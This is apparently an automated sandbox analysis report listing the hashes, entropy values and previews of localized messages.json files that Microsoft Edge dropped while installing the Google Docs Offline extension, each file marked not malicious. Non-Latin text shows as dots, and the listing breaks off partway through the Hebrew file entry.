                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
